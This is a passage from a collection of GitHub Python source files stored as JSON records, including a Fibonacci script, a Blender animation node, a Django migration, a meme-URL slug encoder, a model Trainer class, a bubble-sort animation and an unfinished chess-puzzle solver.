{})\n\n\ndef setup(bot):\n check_folders()\n check_files()\n bot.add_cog(oboobs(bot))\n","repo_name":"inpprenable/RustyBot","sub_path":"oboobs/oboobs.py","file_name":"oboobs.py","file_ext":"py","file_size_in_byte":15751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"35825869014","text":"# Variables\nno_of_neighbors = 4\nrand_neighbors = 0\nno_of_nodes = 50\nno_of_steps = 4\n\n# parameters\nedge_strength_chance = .33333\nlow_edge_strength = 0\nhigh_edge_strength = 1\nK = 0.01\n\n#colors\nnode_color = '#007959'\nedge_color = '#000000'\n\n#networks\n# network_type = 'watts_strogatz'\nnetwork_type = 'barabasi_albert'\n\n\nsimilarity_treshold = .1\n# run_count = 0","repo_name":"BenDickens/Brandwonden-Project-IAS","sub_path":"Example Mesa/Code/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"13066932935","text":"#!/usr/bin/env python3.6\nimport argparse\nimport math\nimport numpy as np\n\n\ndef main(args):\n a, b = 0, 1\n for _ in range(args.n):\n a, b = b, a+b\n\n print(a)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', type=int, required=True)\n\n args = parser.parse_args()\n main(args)\n","repo_name":"davidb2/rosalind","sub_path":"src/python/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"16494399293","text":"import bpy\r\nfrom bpy.props import *\r\nfrom . mix_data import getMixCode\r\nfrom ... base_types import AnimationNode\r\nfrom ... events import executionCodeChanged\r\n\r\nclass AnimateDataNode(bpy.types.Node, AnimationNode):\r\n bl_idname = \"an_AnimateDataNode\"\r\n bl_label = \"Animate Data\"\r\n bl_width_default = 150\r\n dynamicLabelType = \"ALWAYS\"\r\n\r\n onlySearchTags = True\r\n searchTags = [ (\"Animate Matrix\", {\"dataType\" : repr(\"Matrix\")}),\r\n (\"Animate Vector\", {\"dataType\" : repr(\"Vector\")}),\r\n (\"Animate Float\", {\"dataType\" : repr(\"Float\")}),\r\n (\"Animate Color\", {\"dataType\" : repr(\"Color\")}),\r\n (\"Animate Euler\", {\"dataType\" : repr(\"Euler\")}),\r\n (\"Animate Quaternion\", {\"dataType\" : repr(\"Quaternion\")}) ]\r\n\r\n dataType = StringProperty(default = \"Float\", update = AnimationNode.refresh)\r\n\r\n def create(self):\r\n self.newInput(\"Float\", \"Time\", \"time\")\r\n self.newInput(self.dataType, \"Start\", \"start\")\r\n self.newInput(self.dataType, \"End\", \"end\")\r\n self.newInput(\"Interpolation\", \"Interpolation\", \"interpolation\", defaultDrawType = \"PROPERTY_ONLY\")\r\n self.newInput(\"Float\", \"Duration\", \"duration\", value = 20, minValue = 0.001)\r\n\r\n self.newOutput(\"Float\", \"Time\", \"outTime\")\r\n self.newOutput(self.dataType, \"Result\", \"result\")\r\n\r\n def drawLabel(self):\r\n return \"Animate \" + self.inputs[1].dataType\r\n\r\n def getExecutionCode(self):\r\n yield \"finalDuration = max(duration, 0.0001)\"\r\n yield \"influence = max(min(time / finalDuration, 1.0), 0.0)\"\r\n yield \"influence = interpolation(influence)\"\r\n yield getMixCode(self.dataType, \"start\", \"end\", \"influence\", \"result\")\r\n yield \"outTime = time - finalDuration\"\r\n","repo_name":"TREYWANGCQU/Blender_Reaticle","sub_path":"release/scripts/addons/animation_nodes/nodes/generic/animate_data.py","file_name":"animate_data.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}
+{"seq_id":"28543145934","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('vms', '0002_ipaddress_vms'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='backup',\n name='manifest_path',\n field=models.CharField(max_length=255, verbose_name='Manifest path', blank=True),\n ),\n ]\n","repo_name":"erigones/esdc-ce","sub_path":"vms/migrations/0003_backup_manifest_path.py","file_name":"0003_backup_manifest_path.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"92"}
+{"seq_id":"35867216913","text":"import hashlib\nimport re\nfrom urllib.parse import unquote\n\n\ndef encode(lines: list[str]) -> str:\n encoded_lines = []\n\n for line in lines:\n if line == \"/\":\n encoded_lines.append(\"_\")\n elif line:\n encoded_lines.append(_encode(line))\n else:\n encoded_lines.append(\"_\")\n\n slug = \"/\".join(encoded_lines)\n\n return slug or \"_\"\n\n\ndef _encode(line):\n has_trailing_under = \"_ \" in line\n\n encoded = unquote(line)\n\n for before, after in [\n (\"_\", \"__\"),\n (\"-\", \"--\"),\n (\" \", \"_\"),\n (\"?\", \"~q\"),\n (\"%\", \"~p\"),\n (\"#\", \"~h\"),\n ('\"', \"''\"),\n (\"/\", \"~s\"),\n (\"\\\\\", \"~b\"),\n (\"\\n\", \"~n\"),\n (\"&\", \"~a\"),\n (\"<\", \"~l\"),\n (\">\", \"~g\"),\n (\"‘\", \"'\"),\n (\"’\", \"'\"),\n (\"“\", '\"'),\n (\"”\", '\"'),\n (\"–\", \"-\"),\n ]:\n encoded = encoded.replace(before, after)\n\n if has_trailing_under:\n encoded = encoded.replace(\"___\", \"__-\")\n\n return encoded\n\n\ndef decode(slug: str) -> list[str]:\n has_dash = \"_----\" in slug\n has_flag = \"_--\" in slug\n has_arrow = \"_--~g\" in slug\n has_under = \"___\" in slug\n\n slug = slug.replace(\"_\", \" \").replace(\" \", \"_\")\n slug = slug.replace(\"-\", \" \").replace(\" \", \"-\")\n slug = slug.replace(\"''\", '\"')\n\n if has_dash:\n slug = slug.replace(\"-- \", \" --\")\n elif has_flag:\n slug = slug.replace(\"- \", \" -\")\n\n if has_arrow:\n slug = slug.replace(\"- ~g\", \" -~g\")\n\n if has_under:\n slug = slug.replace(\"_ \", \" _\")\n\n for before, after in [\n (\"~q\", \"?\"),\n (\"~p\", \"%\"),\n (\"~h\", \"#\"),\n (\"~n\", \"\\n\"),\n (\"~a\", \"&\"),\n (\"~l\", \"<\"),\n (\"~g\", \">\"),\n (\"~b\", \"\\\\\"),\n ]:\n slug = slug.replace(before, after)\n\n lines = slug.split(\"/\")\n lines = [line.replace(\"~s\", \"/\") for line in lines]\n\n return lines\n\n\ndef normalize(slug: str) -> tuple[str, bool]:\n slug = unquote(slug)\n normalized_slug = encode(decode(slug))\n return normalized_slug, slug != normalized_slug\n\n\ndef fingerprint(value: str, *, prefix=\"_custom-\", suffix=\"\") -> str:\n return prefix + hashlib.sha1(value.encode()).hexdigest() + suffix\n\n\ndef slugify(value: str) -> str:\n return re.sub(r\"[^a-z0-9-]\", \"\", value).strip(\"-\")\n","repo_name":"jacebrowning/memegen","sub_path":"app/utils/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":1161,"dataset":"github-code","pt":"92"}
+{"seq_id":"7528553891","text":"from application.views.model_utils import VideoModel\nfrom application.views.utils.config_utils import config\nimport time\nimport numpy as np\n\n\n\nmodel = VideoModel(config.thumos19)\nmodel.prop_model.load_prerun_result()\nmodel.cluster_helper.call_test()\n\n\nexit(0)\ntime1 = time.time()\n\nclass_label = 0\naction_id = \"686-10\"\nn_neighbors = 5\n\naction_ids = model.cluster_helper.get_actions(class_label)\nprint(action_ids[0])\nprint(len(action_ids))\n\ndist = model.cluster_helper.get_alignment_of_anchor_action(class_label, action_id, n_neighbors)\ndist = np.array(dist)\n\nfrom itertools import permutations\n# both p1 and p2 should be a permutation of 0-n sequence.\ndef count_reverse_pair(p, q, d = None):\n n = len(p)\n cnt = 0\n for i in range(n):\n for j in range(i + 1, n):\n if (p[i] < p[j]) != (q[i] < q[j]):\n if d is None:\n cnt += 1\n else:\n cnt += abs(d[i] - d[j])\n return cnt\n\n# alpha is a parameter to balance the between cost and self cost.\ndef get_order_by_dist_matrix(input_dist, alpha = 1.0):\n input_dist = np.array(input_dist)\n n_cols = input_dist.shape[1]\n n_rows = input_dist.shape[0]\n order = [i for i in range(n_rows)]\n all_states = [x for x in permutations(order)]\n col_states = []\n for i in range(n_cols):\n col_states.append(tuple(np.argsort(input_dist[:, i]).tolist()))\n min_value = input_dist[:, i].min()\n max_value = input_dist[:, i].max()\n input_dist[:, i] = (input_dist[:, i] - min_value) / (max_value - min_value) * (n_rows - 1)\n print(col_states)\n dist = {}\n prev = {}\n\n Q = []\n head = 0\n start = (0, col_states[0])\n dist[start] = 0\n prev[start] = None\n Q.append(start)\n\n min_dist = 1e10\n end_state = None\n while head < len(Q):\n curr_state = Q[head]\n col, state1 = curr_state\n head += 1\n d = dist[curr_state]\n if d > min_dist:\n continue\n for state2 in all_states:\n between_cost = count_reverse_pair(state1, state2)\n self_cost = count_reverse_pair(state2, col_states[col + 1], input_dist[:, col + 1])\n cost = between_cost * between_cost + self_cost * self_cost * alpha\n next_state = (col + 1, state2)\n if col + 1 == n_cols - 1:\n if d + cost < min_dist:\n min_dist = d + cost\n prev[next_state] = curr_state\n end_state = next_state\n else:\n if next_state not in dist:\n dist[next_state] = d + cost\n prev[next_state] = curr_state\n Q.append(next_state)\n elif d + cost < dist[next_state]:\n dist[next_state] = d + cost\n prev[next_state] = curr_state\n state = end_state\n ret = []\n while state != None:\n ret.append(state[1])\n state = prev[state]\n ret = ret[::-1]\n return ret\n\nprint(get_order_by_dist_matrix(dist))\n\ntime2 = time.time()\nprint(\"Using time {} s\".format(time2 - time1))\n\n","repo_name":"thu-vis/ActLocalizer","sub_path":"call.py","file_name":"call.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"11618386816","text":"'''Exercício Python 054: Crie um programa que leia o ano de nascimento de sete pessoas.\n No final, mostre quantas pessoas ainda não atingiram a maioridade e quantas já são maiores.\n'''\n\nfrom datetime import date\n\nano = date.today().year\nmaior = 21\nmaiores = 0\nmenores = 0\nprint('Quais anos de nacimento: ')\nfor c in range(1,8):\n nascimento = int(input('{}º Ano: '.format(c)))\n if ano - nascimento >= maior:\n menores = menores + 1\n else:\n maiores = maiores + 1\nprint('{} pessoas ainda não atingiram a maior idade e {} já são maiores'.format(menores, maiores))\n","repo_name":"Dawisonms/Python","sub_path":"Curso em video/Exercicios/Modulo 2/Ex054.py","file_name":"Ex054.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"}
+{"seq_id":"35065919847","text":"\"\"\"\nReading file\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\ngun_data = pd.read_csv('full_data.csv', index_col='Unnamed: 0')\n\n# Changing category to number\n\n#1. Finding all unique values\n\neducation_replace = {\n 'Less than HS': 1,\n 'HS/GED': 2,\n 'Some college': 3,\n 'BA+': 4,\n np.NaN: 5 # Pandas helpfully (unhelpfully) assumes NaN, NA and other variations to be np.NaN type.\n #'NA' is taken as NaN unhelpfully in this case.\n}\n\n#2. Replacing education to values\ngun_data['education'] = gun_data['education'].map(education_replace)\nprint(gun_data['education'].value_counts())\n","repo_name":"jin-park-dev/Data_Analyst_Gun_Death","sub_path":"a_02_gun_death_us/a_02_cleaning.py","file_name":"a_02_cleaning.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"10440287869","text":"from matplotlib import rc\nfrom matplotlib.pyplot import gca, figure, axis, close, Rectangle\nfrom matplotlib.animation import FuncAnimation\nfrom numpy import array\n\nrc('animation', html='jshtml')\n\n\nclass TriBulles:\n def __init__(self, tab):\n N = len(tab)\n self.tab = tab.copy()\n self.width = 10\n\n self.fig = figure(figsize=(len(self.tab), 3))\n axis('off')\n axis('equal')\n axis([0, len(self.tab) * self.width, 0, self.width])\n\n self.rectangles = [gca().add_patch(Rectangle(array([i*self.width, 0]), self.width-1, self.width-1, fc='b'))\n for i in range(N)]\n self.annotations = [gca().annotate(self.tab[i], array([i*self.width, 0])+array([(self.width-1)*.5, (self.width-1)*.5]), color='w',\n weight='bold', fontsize=20,\n ha='center',\n va='center') for i in range(N)]\n self.indices = [n for n in range(N)]\n\n def move_vertical(self, i, j):\n for _ in range(self.width):\n self.rectangles[i].set_xy(\n array(self.rectangles[i].get_xy())-array([0, 1]))\n self.annotations[i].set_position(\n array(self.annotations[i].get_position())-array([0, 1]))\n self.rectangles[j].set_xy(\n array(self.rectangles[j].get_xy())+array([0, 1]))\n self.annotations[j].set_position(\n array(self.annotations[j].get_position())+array([0, 1]))\n yield\n\n def move_horizontal(self, i, j):\n for _ in range(self.width):\n self.rectangles[i].set_xy(\n array(self.rectangles[i].get_xy())+array([1, 0]))\n self.annotations[i].set_position(\n array(self.annotations[i].get_position())+array([1, 0]))\n self.rectangles[j].set_xy(\n array(self.rectangles[j].get_xy())-array([1, 0]))\n self.annotations[j].set_position(\n array(self.annotations[j].get_position())-array([1, 0]))\n yield\n\n def set_color(self, i, j, color):\n self.rectangles[i].set_color(color)\n self.rectangles[j].set_color(color)\n yield\n\n def freeze_color(self, i, color):\n self.rectangles[i].set_color(color)\n yield\n\n def tri(self):\n n = len(self.tab)\n yield\n for i in reversed(range(n)):\n for j in range(i):\n if self.tab[j+1] < self.tab[j]:\n yield from self.set_color(self.indices[j], self.indices[j+1], 'r')\n yield from self.move_vertical(self.indices[j], self.indices[j+1])\n yield from self.move_horizontal(self.indices[j], self.indices[j+1])\n yield from self.move_vertical(self.indices[j+1], self.indices[j])\n yield from self.set_color(self.indices[j], self.indices[j+1], 'b')\n self.tab[j], self.tab[j+1] = self.tab[j+1], self.tab[j]\n self.indices[j], self.indices[j +\n 1] = self.indices[j+1], self.indices[j]\n else:\n yield from self.set_color(self.indices[j], self.indices[j+1], 'y')\n for _ in range(self.width):\n yield\n yield from self.set_color(self.indices[j], self.indices[j+1], 'b')\n yield from self.freeze_color(self.indices[i], 'g')\n for _ in range(self.width):\n yield\n\n def animate(self, i):\n pass\n\n def get_animation(self):\n N = len(self.tab)\n ani = FuncAnimation(self.fig, self.animate, frames=self.tri,\n save_count=N*(N-1)//2*self.width*5)\n close()\n return ani\n","repo_name":"lgarcin/CoursInformatique","sub_path":"_scripts/tri_bulles.py","file_name":"tri_bulles.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"42648408378","text":"import torch\nimport torch.nn.functional as F\nimport numpy as np\nimport os\n\nfrom torch.utils.tensorboard import SummaryWriter\nfrom transformers import Adafactor, AdamW, get_linear_schedule_with_warmup, AutoModelForSeq2SeqLM\nfrom tqdm import tqdm\n\nfrom utils import trim_batch, label_smoothed_nll_loss\n\nclass Trainer(object):\n def __init__(self, config, logger, local_rank=-1):\n self.config = config\n self.logger = logger\n self.pad_token_id = None\n self.local_rank = local_rank\n\n def load_model(self, path=None):\n if path is not None:\n model = AutoModelForSeq2SeqLM.from_pretrained(self.config.model, state_dict=torch.load(path))\n else:\n model = AutoModelForSeq2SeqLM.from_pretrained(self.config.model)\n\n if self.config.do_train and (self.config.model == \"bigscience/T0_3B\" or self.config.model == \"google/t5-xl-lm-adapt\"):\n model.gradient_checkpointing_enable()\n if self.config.do_train and self.config.gradient_checkpointing:\n model.gradient_checkpointing_enable()\n \n return model\n\n def save(self, model, postfix):\n if self.local_rank <= 0:\n model_state_dict = {\n key: value.cpu() \n for key, value in model.state_dict().items()\n }\n torch.save(model_state_dict, os.path.join(self.config.out_dir, \"model-{}.pt\".format(postfix)))\n self.logger.info(\"Saving model with postfix {}\".format(postfix))\n\n def setup_optimizer(self, model):\n config = self.config\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': config.weight_decay},\n {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n if self.config.optimizer == \"adamw\":\n\n optimizer = AdamW(optimizer_grouped_parameters, lr=config.lr, eps=1e-8)\n scheduler = get_linear_schedule_with_warmup(optimizer,\n num_warmup_steps=config.warmup_steps,\n num_training_steps=config.num_training_steps)\n elif self.config.optimizer == \"adafactor\":\n optimizer = Adafactor(optimizer_grouped_parameters,\n lr=config.lr,\n relative_step=False,\n clip_threshold=config.max_grad_norm,\n warmup_init=False)\n scheduler = None\n return optimizer, scheduler\n\n def log(self, tb, log_dict, step):\n for key, value in log_dict.items():\n tb.add_scalar(key, value, step)\n\n def print_tensor(self, input_tensor, output_tensor):\n # print the examples in a tensor\n for i, (in_ids, out_ids) in enumerate(zip(input_tensor.cpu().tolist(), output_tensor.cpu().tolist())):\n input_text = self.tokenizer.decode(in_ids)\n output_text = self.tokenizer.decode(out_ids)\n self.logger.info(\"Example {}\".format(i))\n self.logger.info(\"Input: {}\".format(input_text))\n self.logger.info(\"Output: {}\".format(output_text))\n\n def do_train(self, model, data, dev_data=None):\n self.tokenizer = data.tokenizer # will be used by some functions (e.g., `print_batch` in FiDTrainer)\n\n if self.config.use_tensorboard:\n tb_writer = SummaryWriter(log_dir=self.config.out_dir)\n\n if torch.cuda.is_available():\n model.to(torch.device(\"cuda\"))\n\n model.train()\n\n optimizer, scheduler = self.setup_optimizer(model)\n\n global_step = 0\n global_batch = 0\n train_losses = []\n grad_norms = []\n best_perf = -1\n stop_training = False\n\n pbar = tqdm(total=self.config.num_training_steps)\n for epoch in range(1000000):\n pbar.set_description(\"Epoch {}\".format(epoch))\n for batch in data.dataloader:\n global_batch += 1\n\n # truncate the redundant padding tokens\n # batch = self.trim_batch(batch, pad_token_id=data.tokenizer.pad_token_id)\n loss = self.run_model(model, batch)\n\n if torch.isnan(loss).data:\n self.logger.info(\"Stop training because loss=%s\" % (loss.data))\n stop_training = True\n break\n\n train_losses.append(loss.detach().cpu())\n loss.backward()\n\n if global_batch % self.config.gradient_accumulation_steps == 0:\n global_step += 1\n pbar.update(1)\n\n if self.config.max_grad_norm is not None and self.config.optimizer != \"adafactor\":\n gn = torch.nn.utils.clip_grad_norm_(model.parameters(), self.config.max_grad_norm)\n grad_norms.append(gn.detach().cpu())\n\n optimizer.step()\n if scheduler is not None:\n scheduler.step()\n model.zero_grad()\n\n if self.config.do_valid and global_step % self.config.valid_period == 0:\n assert dev_data is not None\n metric, perf = self.do_eval(model, dev_data)\n\n self.logger.info(\"Validation at step {}: {}={}\".format(global_step, metric, perf))\n \n if self.config.use_tensorboard:\n log_dict = {\"dev_performance\": perf}\n self.log(tb_writer, log_dict, global_step)\n \n if perf > best_perf:\n self.logger.info(\"Saving the best model so far ({}: {} --> {})\".format(metric, best_perf, perf))\n self.save(model, \"best\")\n best_perf = perf\n\n model.train() # do_eval switches the model to eval mode; here we switch back\n \n if self.config.use_tensorboard and global_step % self.config.log_period == 0:\n log_dict = {\"loss\": np.mean(train_losses)}\n train_losses = []\n if len(grad_norms) > 0:\n log_dict[\"grad_norm\"] = np.mean(grad_norms)\n grad_norms = []\n self.log(tb_writer, log_dict, global_step)\n\n if self.config.save and global_step % self.config.save_period == 0:\n self.save(model, str(global_step))\n\n if global_step==self.config.num_training_steps or stop_training:\n break\n\n if global_step==self.config.num_training_steps or stop_training:\n break\n\n pbar.close()\n self.logger.info(\"Finish training\")\n \n if self.config.save:\n self.save(model, \"last\")\n\n return best_perf\n\n def do_eval(self, model, data):\n model.eval()\n if torch.cuda.is_available():\n model.to(torch.device(\"cuda\"))\n\n assert self.config.eval_mode in [\"rank_classification\", \"generation\"]\n\n if self.config.eval_mode == \"rank_classification\":\n predictions = self.do_eval_rank_classification(model, data)\n # from collections import Counter\n # counter = Counter(predictions)\n # print(counter)\n elif self.config.eval_mode == \"generation\":\n predictions = self.do_eval_generation(model, data)\n \n perf = data.evaluate(predictions)\n self.logger.info(\"Evaluation results: {}\".format(perf))\n return perf\n\n def do_eval_rank_classification(self, model, data):\n losses = []\n for batch in tqdm(data.dataloader, desc=\"Eval (Rank)\"):\n with torch.no_grad():\n # self.logger.info(batch[0])\n # self.print_tensor(batch[0], batch[2])\n # breakpoint()\n loss = self.run_model(model, batch, is_training=False)\n losses += loss.cpu().detach().numpy().tolist()\n losses = np.array(losses)\n\n predictions = []\n for idx, dp in enumerate(data.metadata):\n curr_instance_losses = [losses[indices] for indices in dp[\"indices\"]]\n prediction_idx = sorted(enumerate(curr_instance_losses), key=lambda x: x[1])[0][0]\n prediction = dp[\"options\"][prediction_idx]\n predictions.append(prediction.strip())\n\n return predictions\n\n def do_eval_generation(self, model, data):\n pad_token_id = data.tokenizer.pad_token_id\n predictions = []\n for batch in tqdm(data.dataloader, desc=\"Eval (Generation)\"):\n with torch.no_grad():\n if torch.cuda.is_available():\n batch = [b.to(torch.device(\"cuda\")) for b in batch]\n batch = self.trim_batch(batch, pad_token_id=data.tokenizer.pad_token_id)\n outputs = model.generate(input_ids=batch[0],\n attention_mask=batch[1],\n num_beams=4,\n max_length=64,\n early_stopping=True,\n use_cache=True)\n predictions += data.decode_batch(outputs)\n\n return predictions\n\n def trim_batch(self, batch, pad_token_id):\n batch[0], batch[1] = trim_batch(batch[0], pad_token_id, batch[1])\n if len(batch) == 4:\n batch[2], batch[3] = trim_batch(batch[2], pad_token_id, batch[3])\n return batch \n\n def run_model(self, model, batch, is_training=True):\n if torch.cuda.is_available():\n batch = [b.to(torch.device(\"cuda\")) for b in batch]\n\n batch = self.trim_batch(batch, self.pad_token_id)\n input_ids, attention_mask = batch[0], batch[1]\n decoder_input_ids, decoder_attention_mask = batch[2], batch[3]\n\n\n if is_training and self.config.train_with_generation_loss:\n decoder_input_ids [decoder_input_ids == self.pad_token_id] = -100\n\n output = model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n labels=decoder_input_ids,\n decoder_attention_mask=decoder_attention_mask,\n use_cache=False\n )\n\n if is_training and self.config.train_with_generation_loss:\n return output.loss\n\n # rank_classification\n lprobs = F.log_softmax(output.logits, dim=-1)\n loss, _ = label_smoothed_nll_loss(\n lprobs, decoder_input_ids, \n epsilon=0.0, \n # epsilon=0.1 if is_training else 0.0, \n ignore_index=model.config.pad_token_id,\n average=self.config.loss_avg_mode, # by default it's per-instance token-avg loss\n )\n\n if is_training:\n return loss.mean()\n else:\n return loss\n\n","repo_name":"INK-USC/FiD-ICL","sub_path":"encdec/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"90"}
+{"seq_id":"19820885386","text":"import sys\n\nif (len(sys.argv) != 2):\n\tprint(\"Usage: sat-solver.py N\")\n\tquit()\n\n\n# N represents the board size\nN = int(sys.argv[1])\n\n# Represents a piece, with the type (queen, rook, bishop, or knight)\n# as well as the x and y position on the board\nclass piece:\n\tdef __init__(self, type, x, y):\n\t\tself.type = type\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef __str__(self):\n\t\treturn (\"\" + type + x + y)\n\n# Checks if a given x, y location contains a piece or not\ndef haspiece(board, x, y):\n\tfor p in board:\n\t\tif (p.x == x and p.y == y):\n\t\t\treturn (\" \" + p.type + \" \")\n\treturn \" \"\n\n# Prints a chessboard in a visually accurate manner\ndef printchessboard(board):\n\tfor x in range(N):\n\t\tfor y in range(N):\n\t\t\tprint(haspiece(board, x, y), end = '')\n\t\tprint(\"\")\n\n# Compares 2 boards. If they are the same, returns True.\n# Returns false if they are not the same\ndef compareboards(b1, b2):\n\tif (len(b1) == len(b2)):\n\t\tsame = True\n\t\tfor p1 in b1:\n\t\t\toneofthose = False\n\t\t\tfor p2 in b2:\n\t\t\t\tif (p1.x == p2.x and p1.y == p2.y):\n\t\t\t\t\toneofthose = True\n\t\t\tsame = same and oneofthose\n\t\treturn same\n\telse :\n\t\treturn False\n\n# Checks to see if a list of baords contains an instance of another board\n# Returns True if it does contain that board, false otherwise\ndef boardscontains(board, listofb):\n\tfor b in listofb:\n\t\tif (compareboards(b, board)):\n\t\t\treturn True\n\treturn False\n\n\n\n# Returns false if it intersects with another piece, \n# return true if it is clear to place a piece down\ndef check_linear(placed_piece, board):\n\tif (not board):\n\t\treturn True\n\tfor p in board:\n\t\tif (p.x == placed_piece.x or p.y == placed_piece.y):\n\t\t\treturn False\n\n\treturn True\n\n\n# Returns false if it intersects with another piece, \n# return true if it is clear to place a piece down\ndef check_diagonal(placed_piece, board):\n\tfor p in board:\n\t\tif (abs(placed_piece.x - p.x) == abs(placed_piece.y - p.y)):\n\t\t\treturn False\n\treturn True\n\n\n# given a piece and board, return true if the square is not being attacked by a knight\n# returns false otherwise\ndef check_knight(piece, board):\n\tfor p in board:\n\t\tif ((p.x == piece.x - 2 and p.y == piece.y - 1) \n\t\t\tor (p.x == piece.x - 2 and p.y == piece.y + 1)\n\t\t\tor (p.x == piece.x + 2 and p.y == piece.y - 1)\n\t\t\tor (p.x == piece.x + 2 and p.y == piece.y + 1)\n\t\t\tor (p.x == piece.x - 1 and p.y == piece.y - 2)\n\t\t\tor (p.x == piece.x - 1 and p.y == piece.y + 2)\n\t\t\tor (p.x == piece.x + 1 and p.y == piece.y - 2)\n\t\t\tor (p.x == piece.x + 1 and p.y == piece.y + 2)):\n\t\t\treturn False\n\t\n\treturn True\n\n\n\ndef make_queen_boards(currentboard, y):\n\tglobal queen_boards\n\tglobal N\n\n\tif (y == N):\n\t\treturn\n\n\tfor x in range(N):\n\t\tif (check_linear(piece(\"Q\", x, y), currentboard)\n\t\t\tand check_diagonal(piece(\"Q\", x, y), currentboard)):\n\n\t\t\tcurrentboard.append(piece(\"Q\", x, y))\n\n\t\t\tif (len(currentboard) == N):\n\t\t\t\tqueen_boards.append(currentboard.copy())\n\n\t\t\tmake_queen_boards(currentboard, y + 1)\n\t\t\tcurrentboard.pop()\n\n\n# Generates all possibilities for boards with N rooks following the rules\n# of the chess puzzle\ndef make_rook_boards(currentboard, y):\n\tglobal rook_boards\n\tglobal N\n\n\tif (y == N):\n\t\treturn\n\n\tfor x in range(N):\n\t\tif (check_linear(piece(\"R\", x, y), currentboard)):\n\t\t\tcurrentboard.append(piece(\"R\", x, y))\n\n\t\t\tif (len(currentboard) == N):\n\t\t\t\trook_boards.append(currentboard.copy())\n\n\t\t\tmake_rook_boards(currentboard, y + 1)\n\t\t\tcurrentboard.pop()\n\n\n# Generates all possibilities for boards with bishops following the rules\n# of the chess puzzle\ndef make_bish_boards():\n\tfor x in range (N):\n\t\tfor y in range(N):\n\t\t\tmake_bish_boards_r([piece(\"B\", x, y)], 0)\n\n# Recursive function for generating bishop boards\ndef make_bish_boards_r(currentboard, y):\n\tglobal bish_boards\n\tglobal N\n\n\tif (y == N):\n\t\treturn\n\n\tfor x in range(N):\n\n\n\t\tif (check_diagonal(piece(\"B\", x, y), currentboard)):\n\n\n\t\t\tcurrentboard.append(piece(\"B\", x, y))\n\n\t\t\tif (len(currentboard) == ((2 * N) - 2)):\n\t\t\t\tif(not boardscontains(currentboard, bish_boards)):\n\t\t\t\t\tbish_boards.append(currentboard.copy())\n\n\t\t\tif (x == N - 1):\n\t\t\t\tmake_bish_boards_r(currentboard, y + 1)\n\t\t\telse:\n\t\t\t\tmake_bish_boards_r(currentboard, y)\n\t\t\tcurrentboard.pop()\n\t\telse:\n\t\t\tif (x == N - 1):\n\t\t\t\tmake_bish_boards_r(currentboard, y + 1)\n\n\nmaxlen = 0\ndef make_knight_boards(combinedboards):\n\tfor b in combinedboards:\n\t\tfor x in range (N):\n\t\t\tfor y in range(N):\n\t\t\t\tmake_knight_boards_r([piece(\"K\", x, y)], 0, 0, b)\n\ndef make_knight_boards_r(currentboard, y, startx, b):\n\tglobal knight_boards\n\tglobal N\n\tglobal maxlen\n\tglobal solved\n\n\tif (y == N):\n\t\treturn\n\n\tfor x in range(startx, N):\n\n\t\tif (check_knight(piece(\"K\", x, y), currentboard) and (haspiece(b, x, y) == \" \")):\n\n\t\t\tcurrentboard.append(piece(\"K\", x, y))\n\t\t\t\n\t\t\tif (len(currentboard) > maxlen):\n\t\t\t\tmaxlen = len(currentboard)\n\t\t\t\tknight_boards = []\n\t\t\t\tknight_boards.append(currentboard.copy())\n\t\t\t\tsolved = []\n\t\t\t\tcombd = comboard(b, currentboard.copy())\n\t\t\t\tif (not combd == []):\n\t\t\t\t\tsolved.append(combd.copy())\n\n\t\t\telif (len(currentboard) == maxlen):\n\t\t\t\tif(not boardscontains(currentboard, knight_boards)):\n\t\t\t\t\tknight_boards.append(currentboard.copy())\n\t\t\t\t\tcombd = comboard(b, currentboard.copy())\n\t\t\t\t\tif (not combd == []):\n\t\t\t\t\t\tsolved.append(combd.copy())\n\n\t\t\tif (x == N - 1):\n\t\t\t\tmake_knight_boards_r(currentboard, y + 1, 0, b)\n\t\t\telse:\n\t\t\t\tmake_knight_boards_r(currentboard, y, x + 1, b)\n\t\t\tcurrentboard.pop()\n\t\telse:\n\t\t\tif (x == N - 1):\n\t\t\t\tmake_knight_boards_r(currentboard, y + 1, 0, b)\n\n\n\n# prints \ndef printboard(board):\n\tfor p in board:\n\t\tprint(#\"Piece, x, y\", \n\t\t\tp.type, p.x, p.y)\n\treturn\n\n# Combines two boards with no overlap in pieces. If there is any overlap,\n# it returns an empty list.\ndef comboard(board1, board2):\n\tnewboard = []\n\tfor p1 in board1:\n\t\tfor p2 in board2:\n\t\t\tif (p1.x == 